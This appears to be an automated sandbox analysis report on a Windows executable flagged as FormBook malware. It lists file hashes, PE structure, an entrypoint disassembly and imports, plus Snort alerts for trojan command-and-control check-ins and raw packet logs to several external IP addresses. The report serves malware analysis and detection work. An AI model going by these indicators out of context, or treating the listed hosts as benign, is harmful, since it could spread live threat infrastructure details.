• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: v8kZUFgdD4.exe
File size: 188889
MD5: 57f3ae2842ffb5ceea386d0b97a52818
SHA1: 68423398d025d3cbbb944ee4c3cea5501df67761
SHA256: a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
SHA512: f398186c2f5adb9726aac3aead8289abc9288404b4b39dbabc66494a77b0160ca560cf52c9f76b15b34619f150f516a74db96db967f75942f3c9f325c5da4a81
SSDEEP: 3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`...........

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x40205a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x60F97EF0 [Thu Jul 22 14:21:36 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 91ecb5a25c0109a651f89e2d72e3496d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 004050F8h
push 00402D34h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00405050h]
xor edx, edx
mov dl, ah
mov dword ptr [0040627Ch], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [00406278h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [00406274h], ecx
shr eax, 10h
mov dword ptr [00406270h], eax
push 00000001h
call 00007F6BF0C0972Dh
pop ecx
test eax, eax
jne 00007F6BF0C08BEAh
push 0000001Ch
call 00007F6BF0C08CA7h
pop ecx
call 00007F6BF0C0964Dh
test eax, eax
jne 00007F6BF0C08BEAh
push 00000010h
call 00007F6BF0C08C96h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007F6BF0C0947Bh
call 00007F6BF0C093D5h
mov dword ptr [00406694h], eax
call 00007F6BF0C0925Eh
mov dword ptr [00406264h], eax
call 00007F6BF0C0902Bh
call 00007F6BF0C08F6Eh
call 00007F6BF0C08C8Ch
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [0040504Ch]
call 00007F6BF0C08F12h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F6BF0C08BE8h
movzx eax, word ptr [ebp-2Ch]

Rich Headers

Programming Language:
• [ C ] VS98 (6.0) build 8168
• [C++] VS98 (6.0) build 8168
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2008 SP1 build 30729
Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5430 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x5000 | 0xf8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x341c | 0x3600 | False | 0.580005787037 | data | 6.26349761527 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x5000 | 0x964 | 0xa00 | False | 0.44921875 | data | 5.07425103063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6000 | 0x698 | 0x400 | False | 0.2001953125 | data | 1.23908157506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
USER32.dll | GrayStringW, GetDC
SHLWAPI.dll | StrCmpNIA, StrToIntA, PathBuildRootA, UrlCompareA, StrCmpNA, UrlCanonicalizeA
WINSPOOL.DRV | AddJobA, GetPrinterW, DeviceCapabilitiesW, OpenPrinterA
WS2_32.dll | bind, recv, WSACleanup, getprotobyname
KERNEL32.dll | GetEnvironmentStrings, LoadLibraryA, GetProcAddress, HeapReAlloc, VirtualAlloc, HeapAlloc, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetModuleFileNameA, WriteFile, RtlUnwind, HeapFree, VirtualFree, HeapCreate, HeapDestroy, GetLastError, TlsGetValue, GetModuleHandleA, GetStartupInfoW, GetVersion, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError
Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/22/21-17:43:18.792527 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 34.102.136.180
07/22/21-17:43:18.792527 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 34.102.136.180
07/22/21-17:43:18.792527 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 34.102.136.180
07/22/21-17:43:18.931600 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49748 | 34.102.136.180 | 192.168.2.6
07/22/21-17:43:31.750777 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
07/22/21-17:43:36.803444 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 52.58.78.16
07/22/21-17:43:36.803444 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 52.58.78.16
07/22/21-17:43:36.803444 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 52.58.78.16
07/22/21-17:43:47.172087 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49758 | 34.102.136.180 | 192.168.2.6
07/22/21-17:44:09.256104 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49762 | 80 | 192.168.2.6 | 103.138.88.11
07/22/21-17:44:09.256104 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49762 | 80 | 192.168.2.6 | 103.138.88.11
07/22/21-17:44:09.256104 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49762 | 80 | 192.168.2.6 | 103.138.88.11
07/22/21-17:44:14.927140 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 162.241.62.54
07/22/21-17:44:14.927140 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 162.241.62.54
07/22/21-17:44:14.927140 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 162.241.62.54

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:43:11.343118906 CEST | 49734 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:11.575372934 CEST | 80 | 49734 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:12.136018038 CEST | 49734 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:12.368423939 CEST | 80 | 49734 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:13.014456034 CEST | 49734 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:13.246651888 CEST | 80 | 49734 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:14.653124094 CEST | 49740 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:14.882957935 CEST | 80 | 49740 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:15.526932955 CEST | 49740 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:15.758316040 CEST | 80 | 49740 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:16.326723099 CEST | 49740 | 80 | 192.168.2.6 | 154.88.31.204
Jul 22, 2021 17:43:16.556637049 CEST | 80 | 49740 | 154.88.31.204 | 192.168.2.6
Jul 22, 2021 17:43:18.749845028 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.792249918 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.792349100 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.792526960 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.834424019 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.931600094 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.931624889 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:18.931854963 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.931946039 CEST | 49748 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:18.973994970 CEST | 80 | 49748 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:24.088432074 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.280039072 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.283181906 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.283298969 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.473177910 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.475476027 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.475632906 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:24.475788116 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.475841045 CEST | 49752 | 80 | 192.168.2.6 | 169.62.77.158
Jul 22, 2021 17:43:24.666521072 CEST | 80 | 49752 | 169.62.77.158 | 192.168.2.6
Jul 22, 2021 17:43:36.760740042 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.802845001 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.803149939 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.803443909 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.847222090 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.847250938 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.847265005 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:36.847419977 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.847469091 CEST | 49753 | 80 | 192.168.2.6 | 52.58.78.16
Jul 22, 2021 17:43:36.889657021 CEST | 80 | 49753 | 52.58.78.16 | 192.168.2.6
Jul 22, 2021 17:43:46.990670919 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.033973932 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.034095049 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.034261942 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.077419043 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.172086954 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.172107935 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:47.172236919 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.172348976 CEST | 49758 | 80 | 192.168.2.6 | 34.102.136.180
Jul 22, 2021 17:43:47.214202881 CEST | 80 | 49758 | 34.102.136.180 | 192.168.2.6
Jul 22, 2021 17:43:57.808830023 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.053662062 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.053909063 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.054111004 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.297991991 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.298029900 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.298044920 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:43:58.298280001 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.298341036 CEST | 49760 | 80 | 192.168.2.6 | 119.59.120.26
Jul 22, 2021 17:43:58.542184114 CEST | 80 | 49760 | 119.59.120.26 | 192.168.2.6
Jul 22, 2021 17:44:03.474526882 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.542164087 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.542320967 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.542511940 CEST | 49761 | 80 | 192.168.2.6 | 62.149.128.40
Jul 22, 2021 17:44:03.612077951 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.612123013 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
Jul 22, 2021 17:44:03.612144947 CEST | 80 | 49761 | 62.149.128.40 | 192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612165928 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:03.612847090 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.612873077 CEST4976180192.168.2.662.149.128.40
                                                                  Jul 22, 2021 17:44:03.692063093 CEST804976162.149.128.40192.168.2.6
                                                                  Jul 22, 2021 17:44:08.996076107 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.255644083 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.255965948 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.256103992 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.551270008 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556632996 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556662083 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:09.556957006 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.556978941 CEST4976280192.168.2.6103.138.88.11
                                                                  Jul 22, 2021 17:44:09.871092081 CEST8049762103.138.88.11192.168.2.6
                                                                  Jul 22, 2021 17:44:14.757420063 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:14.926631927 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:14.926965952 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:14.927139997 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.094000101 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.440208912 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.647013903 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720453024 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720489979 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720509052 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.720535994 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.720561028 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.720598936 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.730438948 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.730526924 CEST4976380192.168.2.6162.241.62.54
                                                                  Jul 22, 2021 17:44:15.730544090 CEST8049763162.241.62.54192.168.2.6
                                                                  Jul 22, 2021 17:44:15.730595112 CEST4976380192.168.2.6162.241.62.54

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:42:03.511848927 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:03.569889069 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:04.450882912 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:04.500457048 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:05.441169024 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:05.491653919 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:06.618273020 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:06.677932024 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:06.793505907 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:06.852504969 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:08.337930918 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:08.397641897 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:09.781018019 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:09.830863953 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:10.985940933 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:11.043087959 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:12.190715075 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:12.243096113 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:13.402030945 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:13.451323032 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:14.271378994 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:14.330457926 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:15.578588963 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:15.636074066 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:16.940037966 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:16.990402937 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:18.087132931 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:18.137650013 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:19.463337898 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:19.515728951 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:20.275600910 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:20.325866938 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:21.392210960 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:21.450920105 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:23.156260014 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:23.216284990 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:39.544902086 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:39.607366085 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:57.953447104 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:58.013339043 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:42:59.305155993 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:42:59.362071991 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:10.196938038 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:10.256752968 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:11.126398087 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:11.301726103 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:11.337713003 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:11.413774014 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:12.377896070 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:12.434833050 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:12.910334110 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:12.985701084 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:13.392081022 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:13.452209949 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:14.429198027 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:14.528397083 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:14.586556911 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:14.637433052 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:15.729002953 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:15.786372900 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:16.234397888 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:16.294121981 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:16.988153934 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:17.037671089 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:18.265986919 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:18.327318907 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:19.089314938 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:19.146363020 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:21.120238066 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:21.179997921 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:22.011571884 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:22.072957039 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:23.938721895 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:24.086940050 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:29.505934000 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:30.544126987 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:31.544264078 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:31.679512024 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:31.749258995 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:32.341495037 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:36.693537951 CEST | 61178 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:36.758774996 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:40.869638920 CEST | 57017 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:40.941163063 CEST | 53 | 57017 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:44.985136032 CEST | 56327 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:45.052967072 CEST | 53 | 56327 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:46.928169966 CEST | 50243 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:46.989679098 CEST | 53 | 50243 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:47.187015057 CEST | 62055 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:47.252425909 CEST | 53 | 62055 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:52.184102058 CEST | 61249 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:52.401670933 CEST | 53 | 61249 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:43:57.417082071 CEST | 65252 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:43:57.807579994 CEST | 53 | 65252 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:03.409462929 CEST | 64367 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:03.471841097 CEST | 53 | 64367 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:08.630681038 CEST | 55066 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:08.993699074 CEST | 53 | 55066 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:14.569951057 CEST | 60211 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:14.755909920 CEST | 53 | 60211 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:20.458342075 CEST | 56570 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:20.523808956 CEST | 53 | 56570 | 8.8.8.8 | 192.168.2.6
Jul 22, 2021 17:44:25.974387884 CEST | 58454 | 53 | 192.168.2.6 | 8.8.8.8
Jul 22, 2021 17:44:26.063608885 CEST | 53 | 58454 | 8.8.8.8 | 192.168.2.6

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
